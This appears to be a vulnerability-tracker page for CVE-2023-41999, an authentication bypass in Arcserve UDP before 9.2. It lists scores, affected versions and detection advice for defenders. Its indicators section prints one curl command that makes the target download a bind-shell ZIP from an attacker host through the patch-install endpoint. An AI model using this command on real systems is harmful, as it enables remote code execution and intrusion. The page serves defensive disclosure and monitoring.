CVE-2023-41999
published 2023-11-27CVE-2023-41999: An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that…
PriorityP269critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EPSS
1.44%
69.8th percentile
An authentication bypass exists in Arcserve UDP prior to version 9.2. An unauthenticated, remote attacker can obtain a valid authentication identifier that allows them to authenticate to the management console and perform tasks that require authentication.
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arcserve | arcserve_udp | < 9.2 | 9.2 |
| arcserve | udp | < 9.2 | 9.2 |
Detection & IOCsextracted from sources · hover to see the quote
commandcurl -ki -H 'Content-Type: text/xml' -d 'http://<attacker>:8000/download/shell_bind_tcp.zip' 'https://<target>:8014/RPSWebServiceImpl/services/RPSService4CPMImpl'↗
- →Monitor for unauthenticated calls to ValidateUserByUUID() on the Arcserve UDP management console, which is the mechanism exploited to obtain a valid authentication UUID without credentials. ↗
- →Alert on unauthenticated access to the getEdgeAccount API endpoint post-authentication-bypass, which exposes administrative credentials including encrypted passwords. ↗
- →Detect inbound requests to /RPSWebServiceImpl/services/RPSService4CPMImpl on port 8014 with Content-Type: text/xml from unauthenticated sources, which may indicate exploitation of the downloadAndInstallPatch() RCE vector (CVE-2023-41998, related context). ↗
- →Monitor for new file creation under \Engine\BIN\patch\ on Arcserve UDP hosts, especially ZIP or EXE files, which may indicate exploitation of the downloadAndInstallPatch() routine. ↗
- →Watch for processes spawned as 'nt authority\system' from the Arcserve Tomcat directory, which is indicative of successful RCE post-exploitation. ↗
- ·The authentication bypass (CVE-2023-41999) relies on the UUID-based authentication mechanism (ValidateUserByUUID) being exposed to unauthenticated remote attackers; this is a design-level weakness in the management console's authentication flow. ↗
- ·The vulnerability affects Arcserve UDP prior to version 9.2; patches are also available for UDP 7.0u2, 8.1, and 9.1 for customers unable to upgrade. ↗
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No public exploits indexed.
2023-11-27
Published